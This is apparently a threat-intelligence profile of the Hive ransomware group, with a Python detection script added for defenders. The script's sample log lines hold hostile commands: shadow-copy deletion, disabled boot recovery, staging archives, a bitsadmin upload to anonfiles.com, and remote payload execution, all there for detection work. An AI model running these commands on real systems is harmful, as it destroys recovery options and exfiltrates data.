Suleyman Ozarslan, PhD

LAST UPDATED ON OCTOBER 17, 2025

Hive Ransomware Group

By Suleyman Ozarslan, PhD & Picus Labs   August 22, 2022   Ransomware

Hive ransomware began operations in June 2021 and quickly drew law enforcement attention by striking a wide range of sectors, with healthcare among the most affected. The group runs a Ransomware-as-a-Service (RaaS) programme: the core operators maintain the malware, the payment portal and the leak site, and recruited affiliates conduct the intrusions at scale. Hive practises double extortion. Sensitive data is stolen before encryption so that, when a victim refuses to pay, the exfiltrated files are published on Hive's data leak site to add reputational and regulatory pressure on top of the outage. The operation maintains ransomware builds for Windows, Linux, FreeBSD and VMware ESXi, so a single affiliate can encrypt workstations, file servers and the hypervisors underneath them in one run.

Affiliates typically gain initial access through phishing, stolen or purchased credentials, exposed remote services such as RDP and VPN gateways without multi-factor authentication, or exploitation of known vulnerabilities, notably the ProxyShell chain in on-premises Microsoft Exchange listed below. Once inside, they perform discovery, move laterally and escalate privileges with common administrative tooling and living-off-the-land techniques (PsExec, WMI, scheduled tasks, Cobalt Strike beacons). Backups and volume shadow copies are disabled or deleted to hinder recovery, and large data sets are archived and uploaded to public file-hosting services before encryption starts, which is what gives the leak site its leverage. Notably, recent Hive variants were rewritten from Go in Rust; the change makes the payload harder to analyse, invalidates signatures written for the Go builds, and can evade some detections.

Defenders can reduce risk by enforcing multi-factor authentication on every remote access path, hardening and monitoring remote services, patching internet-facing systems rapidly (the Exchange bugs listed below had fixes available before Hive affiliates used them), segmenting critical assets and backup infrastructure, keeping offline or immutable backups, and continuously validating detection and response controls against the actual techniques in the tool table below so that gaps are found and closed before an affiliate can use them.

Metadata

Associated Groups: Affiliates - DEV-0237
Associated Country: Russia
First Seen: June 2021
Target Sectors: Automotive, Construction, Education, Energy, Entertainment, Financial Services, Food and Beverage, Government, Hardware, Healthcare, Information Technology, Manufacturing, Real Estate, Retail, Transportation
Target Countries: United States, Argentina, Australia, Brazil, Canada, China, Colombia, El Salvador, France, Germany, India, Italy, Netherlands, Norway, Peru, Portugal, Saudi Arabia, Spain, Switzerland, Taiwan, Thailand, United Kingdom

Modus Operandi

Business Models: Ransomware-as-a-Service (RaaS), Double Extortion, Resource Hijacking (Cryptocurrency Mining)
Extortion Tactics: File Encryption, Data Leakage
Initial Access Methods: Exploit Public-Facing Application, Phishing, External Remote Services
Impact Methods: Data Encryption, Data Exfiltration

Exploited Applications and Vulnerabilities by Hive

Application        | Vulnerability                        | CVE            | CVSS
Microsoft Exchange | ProxyShell remote code execution     | CVE-2021-34473 | 9.8 Critical
Microsoft Exchange | ProxyShell privilege escalation      | CVE-2021-34523 | 9.8 Critical
Microsoft Exchange | ProxyShell security feature bypass   | CVE-2021-31207 | 7.2 High

The three CVEs are used as one chain: the pre-authentication path confusion in the Exchange front end (CVE-2021-34473) reaches the PowerShell back end, CVE-2021-34523 lets the attacker act with Exchange PowerShell privileges, and CVE-2021-31207 turns a mailbox export into an arbitrary file write that drops a web shell. All three were fixed by the April and May 2021 Exchange security updates, so an internet-facing Exchange server that is still exploitable is missing patches that predate Hive's use of them.

Utilized Tools and Malware by Hive

MITRE ATT&CK Tactic: Tools
Execution: Cobalt Strike [1], PowerShell [2], PsExec [3], Windows Task Scheduler [4], WMI [5]
Persistence: Windows Task Scheduler [4]
Privilege Escalation: Mimikatz [6]
Defense Evasion: GMER [7], KillAV [8], PC Hunter [9]
Credential Access: RedLine Stealer [10]
Discovery: TrojanSpy.DATASPY [11]
Lateral Movement: BITSAdmin [12], Cobalt Strike [1], PsExec [3], RDP [13], WMI [5]
Command and Control: BITSAdmin [12]
Exfiltration: 7-Zip [14], Anonfiles [15], MEGA [16], Sendspace [17], Ufile.io [18]
Impact: Hive ransomware [19], NBMiner cryptocurrency miner [20]

GMER and PC Hunter are legitimate rootkit and process inspection utilities; affiliates bring them in to locate and terminate security agents before the payload runs, so their appearance on a server that has no reason to run them is itself a signal.
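The intrusion chain described above and the tool table give a defender concrete behaviours to alert on: shadow copy and backup destruction, archiving with 7-Zip, uploads to the file-hosting services Hive affiliates favour, BITS transfers, and remote execution through PsExec, scheduled tasks and WMI. The following Python script is an added example, not code from Picus or from this page. It runs a small rule set over constructed process-creation log lines and then correlates hits per host so that recovery inhibition combined with data staging on the same machine is raised as a pre-encryption signal. The log format (host|user|parent_image|image|command_line), the host names, the sample command lines and the rule names are assumptions made for the example; point the parser at your own EDR or Sysmon event 1 feed.

```python
import re
from dataclasses import dataclass

# Constructed sample events (not real telemetry), in the assumed form
#   host|user|parent_image|image|command_line
# Raw strings keep the Windows backslashes literal.
SAMPLE_EVENTS = [
    r"WS01|CORP\jdoe|explorer.exe|C:\Windows\System32\cmd.exe|cmd.exe /c vssadmin list shadows",
    r"FS02|CORP\svc_backup|services.exe|C:\Windows\System32\vssadmin.exe|vssadmin.exe delete shadows /all /quiet",
    r"FS02|CORP\svc_backup|cmd.exe|C:\Windows\System32\wbadmin.exe|wbadmin delete catalog -quiet",
    r"FS02|CORP\svc_backup|cmd.exe|C:\Windows\System32\bcdedit.exe|bcdedit /set {default} recoveryenabled no",
    r"FS02|CORP\svc_backup|cmd.exe|C:\Tools\7z.exe|7z.exe a -pH1veL3ak -mhe=on D:\stage\finance.7z D:\Shares\Finance",
    r"FS02|CORP\svc_backup|cmd.exe|C:\Windows\System32\bitsadmin.exe|bitsadmin /transfer leak /upload /priority foreground https://anonfiles.com/upload D:\stage\finance.7z",
    r"DC01|CORP\admin|cmd.exe|C:\Tools\PsExec.exe|PsExec.exe \\WS07 -accepteula -s -d cmd.exe /c C:\Windows\Temp\svc.exe",
    r"DC01|CORP\admin|cmd.exe|C:\Windows\System32\schtasks.exe|schtasks /create /tn Updater /tr C:\Windows\Temp\svc.exe /sc onstart /ru SYSTEM",
    r"DC01|CORP\admin|cmd.exe|C:\Windows\System32\wbem\WMIC.exe|wmic /node:WS08 process call create C:\Windows\Temp\svc.exe",
]

# (ATT&CK technique, rule name, command-line pattern). Patterns are deliberately
# specific: "vssadmin list shadows" from a helpdesk session must not fire.
RULES = [
    ("T1490", "Inhibit System Recovery: shadow copy / backup catalog deletion",
     re.compile(r"vssadmin(\.exe)?\s+delete\s+shadows|wmic(\.exe)?\s+shadowcopy\s+delete"
                r"|wbadmin(\.exe)?\s+delete\s+catalog|Win32_Shadowcopy.*Delete\(\)", re.I)),
    ("T1490", "Inhibit System Recovery: boot recovery disabled",
     re.compile(r"bcdedit(\.exe)?\s+/set\s+\{default\}\s+(recoveryenabled\s+no|bootstatuspolicy\s+ignoreallfailures)", re.I)),
    ("T1560.001", "Archive via 7-Zip with a password (staging for leak)",
     re.compile(r"\b7z[ag]?(\.exe)?\s+a\s+.*-p\S+", re.I)),
    ("T1567.002", "Exfiltration to a public file-hosting service",
     re.compile(r"anonfiles\.com|mega\.(?:nz|io)|sendspace\.com|ufile\.io", re.I)),
    ("T1197", "BITS job used for file transfer",
     re.compile(r"bitsadmin(\.exe)?\s+/(transfer|addfile|create|resume)\b", re.I)),
    ("T1569.002", "Remote service execution via PsExec",
     re.compile(r"psexe(?:c|svc)(?:\.exe)?\b", re.I)),
    ("T1053.005", "Scheduled task created from the command line",
     re.compile(r"schtasks(\.exe)?\s+/create\b", re.I)),
    ("T1047", "WMI remote process creation",
     re.compile(r"wmic(\.exe)?\s+/node:\S+.*process\s+call\s+create", re.I)),
]


@dataclass(frozen=True)
class Alert:
    host: str
    user: str
    technique: str
    name: str
    command_line: str


def scan(events):
    """Apply every rule to the command-line field of each event; one Alert per hit."""
    alerts = []
    for line in events:
        host, user, _parent, _image, cmd = line.split("|", 4)
        for technique, name, pattern in RULES:
            if pattern.search(cmd):
                alerts.append(Alert(host, user, technique, name, cmd))
    return alerts


def correlate(alerts):
    """Group alerts per host and grade the combination, since Hive affiliates
    kill recovery and stage data on the same server shortly before encrypting."""
    by_host = {}
    for a in alerts:
        by_host.setdefault(a.host, set()).add(a.technique)
    verdicts = {}
    for host, techs in by_host.items():
        if "T1490" in techs and techs & {"T1560.001", "T1567.002", "T1197"}:
            severity = "critical"
            reason = "recovery inhibited and data staged or sent out from the same host; encryption is likely imminent"
        elif techs & {"T1569.002", "T1053.005", "T1047"}:
            severity = "high"
            reason = "remote execution tooling in use; inspect the target hosts for the same payload"
        elif "T1490" in techs:
            severity = "high"
            reason = "recovery inhibited"
        else:
            severity = "medium"
            reason = "single-stage match"
        verdicts[host] = {"severity": severity, "techniques": sorted(techs), "reason": reason}
    return verdicts


if __name__ == "__main__":
    found = scan(SAMPLE_EVENTS)
    for a in found:
        print(f"{a.host:5} {a.technique:10} {a.name}")
    for host, v in correlate(found).items():
        print(f"{host}: {v['severity'].upper()} ({', '.join(v['techniques'])}) - {v['reason']}")
```

The benign WS01 line produces nothing, FS02 collects the recovery-inhibition, archiving and upload hits and is graded critical, and DC01 is graded high on remote execution alone. In a real deployment the per-host correlation is the part worth keeping: each individual rule is noisy in isolation (backup software touches shadow copies, admins use PsExec), but the combination within a short window on one server is the pattern the paragraph above describes.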

References

[1] K. Arhart, "Cobalt Strike," Cobalt Strike Research and Development, Aug. 19, 2021. https://www.cobaltstrike.com/ (accessed Jul. 06, 2022).
[2] S. Özarslan, "MITRE ATT&CK T1086 PowerShell," Picus Security. https://www.picussecurity.com/resource/blog/picus-10-critical-mitre-attck-techniques-t1086-powershell (accessed Jul. 06, 2022).
[3] "PsExec - Windows Sysinternals," Microsoft Docs. https://docs.microsoft.com/en-us/sysinternals/downloads/psexec (accessed Jul. 06, 2022).
[4] S. Özarslan, "MITRE ATT&CK T1053 Scheduled Task," Picus Security. https://www.picussecurity.com/resource/blog/picus-10-critical-mitre-attck-techniques-1053-scheduled-task (accessed Jul. 06, 2022).
[5] "Windows Management Instrumentation," Microsoft Docs. https://docs.microsoft.com/en-us/windows/win32/wmisdk/wmi-start-page (accessed Aug. 03, 2022).
[6] "GitHub - gentilkiwi/mimikatz: A little tool to play with Windows security," GitHub. https://github.com/gentilkiwi/mimikatz (accessed Jul. 06, 2022).
[7] "GMER - Rootkit Detector and Remover." http://www.gmer.net (accessed Jul. 06, 2022).
[8] Fraunhofer FKIE, "KillAV (Malware Family)," Malpedia. https://malpedia.caad.fkie.fraunhofer.de/details/win.killav (accessed Jul. 06, 2022).
[9] "PC Hunter," MajorGeeks, Dec. 02, 2018. https://www.majorgeeks.com/files/details/pc_hunter.html (accessed Jul. 06, 2022).
[10] Fraunhofer FKIE, "RedLine Stealer (Malware Family)," Malpedia. https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer (accessed Jul. 06, 2022).
[11] "TrojanSpy.PS1.DATASPY.A," Trend Micro Threat Encyclopedia. https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/trojanspy.ps1.dataspy.a/ (accessed Aug. 03, 2022).
[12] "bitsadmin | LOLBAS," LOLBAS Project. https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/ (accessed Jul. 06, 2022).
[13] Deland-Han, "Understanding Remote Desktop Protocol (RDP) - Windows Server," Microsoft Docs. https://docs.microsoft.com/en-us/troubleshoot/windows-server/remote/understanding-remote-desktop-protocol (accessed Aug. 03, 2022).
[14] "7-Zip." https://www.7-zip.org (accessed Jul. 06, 2022).
[15] "Anonymous File Upload," Anonfiles. https://anonfiles.com (accessed Jul. 06, 2022).
[16] "MEGA." https://mega.io/ (accessed Jul. 06, 2022).
[17] "Free large file hosting. Send big files the easy way!" Sendspace. https://www.sendspace.com (accessed Jul. 06, 2022).
[18] "Upload files for free," Ufile.io. https://ufile.io (accessed Jul. 06, 2022).
[19] Fraunhofer FKIE, "Hive (Malware Family)," Malpedia. https://malpedia.caad.fkie.fraunhofer.de/details/win.hive (accessed Jul. 06, 2022).
[20] "GitHub - NebuTech/NBMiner: GPU Miner for ETH, RVN, BEAM, CFX, ZIL, AE, ERGO," GitHub. https://github.com/NebuTech/NBMiner (accessed Jul. 06, 2022).
